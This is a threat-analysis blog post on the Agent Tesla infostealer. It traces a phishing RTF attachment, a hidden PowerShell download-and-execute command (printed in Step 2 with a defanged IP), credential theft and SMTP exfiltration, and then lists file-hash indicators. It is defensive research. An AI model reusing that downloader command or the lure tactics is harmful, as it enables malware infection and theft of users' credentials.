SecneurX Threat Analysis
- Feb 5, 2022
- 3 min read

Agent Tesla: The RAT Spyware and Infostealer

Agent Tesla is a Malware-as-a-Service Trojan that steals user information and exfiltrates it to the threat actors

Non-Technical Summary

Agent Tesla infects systems generally through a phishing email with an attachment. Users are tricked into opening the attachment, thereby installing the malware. Once installed, Agent Tesla captures sensitive data from the infected system and sends it to a predetermined external location.

About the Threat:

Agent Tesla was first observed in late 2014. It is a known malware-as-a-service spyware focused on stealing sensitive information from a victim’s device.

Agent Tesla uses email as the vector for initial infection. The email uses social engineering tactics to appear legitimate. Some samples appear to contain business enquiries while others contain shipment tracking information that are convincing enough to lure the unsuspecting victim into opening the attachment. On opening, the attachment downloads the malware installer which then establishes external communication and downloads the actual payload. This whole process uses obfuscation to escape detection. Once the installation is complete, two way communication with the CNC is established and information from the infected system is exfiltrated.

Some of the credentials it steals and exfiltrates are –

Credentials from System Registry
Saved credentials from a range of email, messaging applications and commonly used browsers
Credentials of files in VPN, download managers and FTP clients
Keyboard inputs (through a key-logger)
Screenshots
Clipboard data

The trojan generally seems to use CVE-2017-8570 exploit successfully. Another characteristic is the use of SMTP for data exfiltration.

Given that Agent Tesla gives full access of the affected system to the threat actors, it has far reaching repercussions on the victims. Ranging from stolen identity, restriction of access to system resources, launch of further attacks using the victim’s credentials are some of the typical actions of Agent Tesla.

SecneurX’s Analysis of the Modus Operandi

SecneurX's acquisition engine gathered artifacts and examined them using SecneurX Advanced Malware Analysis Platform. This platform provides unrivalled visibility and context to advanced threats with its extensive malware analysis & detection capabilities, in addition to generating a detailed report describing the malware behavior. Extracted Indicators of Compromise (IOCs) and human-readable behavior reports can be used to augment existing intelligence data and help to give ‘context’ to IPs, domains, URLs, registry, process activity, file names and hashes. One such analysis of an artifact is described by our analysts here.

The artifact analysed is SHA256=2ba5487668103c62614cfb4288d1c26a8d5172352b3b34363618c8c91c810818, a document named ‘Fund Released Detail.doc’. This was a Rich Text Format (RTF) file obtained from an email attachment.

The trojan’s behaviour is explained in the following steps.

Step 1

Once the file attachment is opened, it runs a script to download the installer. This can be seen in the rtf dump. Here, object 3 and 5 in the image are the same.

Fig1. Shows contents of the rtf dump highlighting the dumped files

Step 2

The obfuscated script is executed and runs the following command -

powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http[:]//173[.]232[.]204[.]89/ikik[.]exe','%APPDATA%\ikik.exe');Start-Process '%APPDATA%\mb.exe'"

Fig 2. Obfuscated script in the dumped files

Step 3

Communication with the CNC is established and the actual payload is downloaded from the CNC.

Fig 3. Downloaded mb.exe from the CNC

This payload completes the download of the malware and executes it.

Step 4

Once the execution is completed, it grants full control of the affected system to the CNC. User credentials and other information are accesed and the data is exfiltrated to the CNC. The use of SMTP to exfiltrate the data is to be noted here.

Fig 4. User credentials captured for exfiltration

Fig 5. User credentials captured for exfiltration

The full behavior report for the sample can be found in the following URL.

https://www.virustotal.com/gui/file/2ba5487668103c62614cfb4288d1c26a8d5172352b3b34363618c8c91c810818/behavior/SecneurX

Fig 6. The malware exhibiting living off the land and persistence mechanism

IOC

Sha256:

2ba5487668103c62614cfb4288d1c26a8d5172352b3b34363618c8c91c810818

66a666207eeaedb3fdc11f12104c0a3f883bb72c51e9f15ff43e56eff8b47206

695050381418e4ad11f96dbf99a3624cd42a46b4157d973fe26c3a49c60e143d

696128615fd31444f97080cedda71ce2cb4bdfc2cd654bbb1931801f7dfb2a7f

80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006

95aa1cf2e4a12c6d2f9abe75462657683c073129ec04ed3a145c6af071c3c28c

9d11da2a0336d5e8a9791e0b87f98635fd8cb7c98db1749241df64386d02ea86

a3f600d0d1de53ee5f125b1fe51f90c393f74125767abe5bb7cb07725124d76d

a4906bbad1426add984a598b922f99b5cdcef06f2217ceb0061186c9ea0ac1c6

a6f32d2c82c6ee870622b82d8307309a232c2906d555e30cd1cfbc48d489ca01

ac87fc5457cd7299a3df5105d2acb586680a6e9771c9febb5f27434f8bad5d9d

b615de9997243c8fbef6fbc8f9e3890c22faa2adc6b3b849540ecff25b7d806a

c03c78f82f01b7d63da5ec6c64b58170d85dc6b4c0cbfe90bf634fffe352ce75

c9820950f03fc6b01a0683a000d5938cac812b8ae6d1c3bfc42af0bc2a8844fa

cb836996444ea64cbbc74d40ae7a98f45a0ba279176f9b453ab7bcf62a144ded

faea010d01b24b5d602e5cd3e35d7ebb21fc5698732d7c546584ca4a736021ae

Next stage Payload Sha256: